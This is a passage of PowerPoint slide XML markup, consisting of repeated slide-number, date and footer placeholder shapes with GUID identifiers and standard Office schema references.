          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{7003F86E-A88B-4E32-AA31-D52B95D3FCF3}" type="slidenum">
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9726767A-127A-40A1-BF2D-774B3227192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C750011-A0F4-4B56-931D-833B1A3AA2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E5FCED-B629-40B7-96C8-9BB741EFBE95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" anchor="b" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:fld id="{58D53F89-4B21-4825-BA8A-D3A9E77F7047}" type="slidenum">
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Image Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEB982E2-777C-4FC0-90DA-0B5C8B074EB2}"/>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850C30C-E5BE-4B2E-AC0E-4052F06D638E}"/>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02F8-3435-4CAC-BF74-09D22889F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EF9EC-A53B-4F2D-A778-C35007CE3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725D9D-CD13-49E1-8363-FE624B81F96F}"/>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62752C8F-62E2-4FAB-9DE8-1B657A417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C93D6-558D-4844-BB55-9ECD64D7CE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DE613DD-452D-47B5-8541-69FD81D010E0}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="221720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A6CE-AA91-429E-9AFC-8EF599862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C8251-1453-486C-8C28-8FBE81C316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63761-E967-4294-AEDE-21DF4944825A}"/>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C1076083-D632-4806-9BF7-A1098E514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6C51-630B-41BA-A968-CA9C3C9C7097}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{31C23B5B-B2AE-4C96-ACBD-AC53163586F5}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5964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5066C-153C-47CE-8FAC-52D5CC9C4D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2B78A5-918F-4577-B1AC-C984395D6A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E30BE-88B1-4891-9F00-2E7987A08B9B}"/>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F1890D34-084A-453F-B590-25897BF09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0598E-41E1-4C57-960F-3151AEA45D41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{7CBC314A-06D1-4060-BCF9-8B944540EADB}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9176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A2D9-F8CB-42D3-8EBD-DA7D163B04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E070C9-C9A7-436A-939A-CF97055F4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6AABA6-0321-426F-9EB7-8FE15CDD31F4}"/>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9FEF5705-B5F9-4F96-BBB6-4551ACEAD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EFF40-6DFC-4BDB-AF4A-73176973ED7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{55C90A28-4EB6-4B78-A8E5-32519BD5E5A9}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2643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F2F2-5F67-44C4-AE11-A3C860D47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EEEA4-C288-49E2-94C0-6BD53A3A2E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B5A5-1BD5-49F0-9994-89B1F84C0A6E}"/>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65C3885D-2216-4CC6-AFBB-4E0EC03C4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2547C-6130-47A8-9E2D-50A4AF03CB51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{6B3093B7-A8E9-408F-99F5-1EB07551B6CE}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3236412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503E-45CD-45FB-8A8A-97F9C440C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5130C-F6F8-490E-B7A6-B92D18D09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D3F85-AED6-4000-9436-C1FB15B97383}"/>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7B1B648A-5B71-49ED-A618-91987B6F8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3A822-E6D0-4AF5-BF4C-8C2A2B53DA56}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2C3271B7-0395-4782-98F5-46454135C754}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304520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6ED9-58AF-4AAA-A746-5BCE2815C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B21AC-48C5-4D4D-8E41-BBF5909EA5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A43A0-7B2C-422A-831C-92540F20B2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698F47-062A-4C00-8F14-0E545C666113}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058951F4-56EA-420E-A33B-BAEA2F012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05E6F-62B3-4F32-A3DC-561F5004886F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B2806E1-8BE8-4313-91E4-724B14308BBC}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1208349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D9DD-AE67-409D-8B8A-C601C71DB2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5AACD-897D-4F44-9E16-63193B19E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EC056F-CBCE-4325-A1C4-9FB43EE990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51EB4-C823-4BDC-813D-1B29EFB4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276F93-D81C-46E4-AB0D-0062162C05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C731B-9F08-4639-A200-2AD710C30396}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB2B466C-BD2A-41A6-A364-2CA7C073A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4BA47A-2A09-4990-8489-A7A11C5EE007}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{D2FD1587-61DC-423F-A051-2AE1A648245C}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3195266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4221-6000-437A-9AED-46C5EBCBB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A18C8-4269-457C-895C-B1947C581311}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FBAC908-13C8-45A7-9B95-8AD70842CA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17DE3-75D3-4F8F-94D2-9AC5B8873DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{44FF084B-2DD1-47D9-9531-78B705E1EE19}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="742148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58011-5450-41B0-A4BF-01E9D949EE09}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6585438-3BCA-42B2-8EB5-2D09A9458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E436C-F757-4E20-9E09-2A48E747FBD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{ACAB5163-6B6A-4906-A657-2E6710EBDB43}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="617199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F75-5CF8-4E8D-8FFF-FA3A6DA16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820E1-285F-43F4-99ED-1F75C19D5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DDCF5-F8C2-4B79-A4BA-D22AEAFE5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079A1-D93A-442B-B6C2-726021A5892E}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C6D751-6756-4C58-94AF-64AACBC5B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07AEC-BC74-4DD9-8686-8C443E7CF9D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3428C8C-4A74-42F1-BCDC-2BF4289DC127}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82427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9253-7194-4E3A-828B-49CF99E8F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89940-EEA7-4FA1-BC7E-5816C436E4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3F018-721E-4C64-A563-D79DA538F89A}"/>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AC8CF78F-EF65-4C2D-93EB-5E8155569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B78F7-43AD-4AA2-A1C0-42E6CA17BEC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9A07B7D2-C096-4E25-8C2F-9F14B74E9579}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3025426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8718-622D-4183-A9E7-7A6120BD4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6C4EA-A968-46BC-9FC6-48EE70ABA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CE9B49-D803-4C0E-98E4-6A32FE730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2A1E88-D862-4DCF-A1BF-C8BC3D0A1CD2}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80427249-F446-4420-A106-7F98AF5F9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706E5-8247-4D29-A8B3-F9E05ADEA39A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{CECDAB2D-D97F-44E0-891F-860E927ECFC7}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2847911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C6C1-E7E9-4B69-AA66-00D8711CB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CBBFD-DAE8-43FD-8E07-9CBD55559C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A1AB9-E4EE-49D5-915C-ED93326B3544}"/>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97B48C53-0848-435E-B23C-24FA759C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B91FB-E806-494B-855A-1D87E607D9D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A1015840-1449-4DDF-B64A-87EE3AFE8D09}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2329373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77CBA-AFEC-4DA1-8F6E-685534E49E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A46F2-737F-4487-9F73-2F6EC18973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D8963-9117-4924-B504-FA5CADA25FB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:body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D14CA368-2CF2-48AC-A81B-33BE6E4E4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1870D-76AC-4F31-9741-619656E0A23C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5212AD31-C8C4-4D5C-855C-197C4B49615E}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301470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4667-3AC5-4621-BE4C-4055FFDAE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EC319D-230C-41D8-A97D-601E0F1E9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6FAA54-7C7F-4D12-AB33-E9B288D17327}"/>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CE7319F5-CAE7-4693-AD5C-F976FC093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1D530-C59C-464C-B834-D1197F4B64E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1CB3EA11-8187-4306-8FE1-16F7EDF1E07F}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140756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1697-3853-430B-98E9-63C341589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F6190-6379-4BD0-9BD9-F6732D91F4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3ACE7-1E98-4089-82FC-82CF511FBC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7F0129-6B21-40F4-9EB6-9F3561BF6070}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89EA4E87-DF18-4381-A999-299D01D81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F9136-52F6-4518-9FD1-2DC7EF60D580}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{37209C0E-23B3-4123-8547-8433A9009969}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5420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9962-2A9F-47E7-844C-4F1B0C00F8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2BF66-8359-4BCD-8930-EBD25CE81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1CEF01-3C32-480D-9EBF-DF14B60A3D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C9C20B-1B4F-4E6C-91BD-B5AF59721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15A3CF-8585-443D-811F-D21C028568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343963-EFCE-44B4-A0D7-CC4DEAE99559}"/>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8" name="Footer Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{236E920D-47C3-41A3-BCF0-58A57D712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FE093-D93F-430B-A50F-F5CF5F4ADF1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1DC0C41D-B963-4603-B044-5A1CDDC4839F}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17659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670E-F632-4342-BE3C-4BC37B6D9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ACE6D-6E19-4E33-89DF-A357466D61EE}"/>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4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11DFB237-EC6B-4897-B95C-D48FD704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B3F5CF-806D-4FE7-9EB6-2A6348D37E81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{354D9140-5F8A-4775-AB81-BF732DAC8FC0}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249373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7DCF1-DB97-4CA1-90B1-7B7A441F2A2B}"/>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3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78C477FA-F2E4-4CF9-9751-50732B0CE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31F1C-CF5E-46B9-91E8-0DBBCEC16CB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0EE92948-84C9-499D-80A8-90442FBA01E5}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28239420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F82B-F872-45AA-BFEA-E46D71A97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25935-463A-4145-829F-F6C3DADB5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146D11-928B-4C79-A2BD-4CED91D79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A46176-F8D4-497A-A976-B56F6970F61D}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECB507E4-B3C9-42C7-B1F2-4AEEFC0C1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DD97B-8167-49A4-AE24-6BFDACBCC48D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FFDF978A-CB7B-44DF-9A04-557843632B79}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352755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65D6-251E-40D9-BBF1-A2A756234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0C7E4-D24B-4866-B6FA-0C2AB2E00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B65CAF-16E8-4139-BD67-6DCD08AE1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5F70AA-64CC-442F-997C-3410C62093D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3BB167BA-FD27-4F95-85B6-D35B63E3DD8B}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>10/30/2018</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34F7A736-910B-4169-A71E-2464F9541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EDF83-0E3F-49F1-92F8-F1EAA2635BB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DB86957C-11D3-4D3C-916C-A7452C7CF49F}" type="slidenum">
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
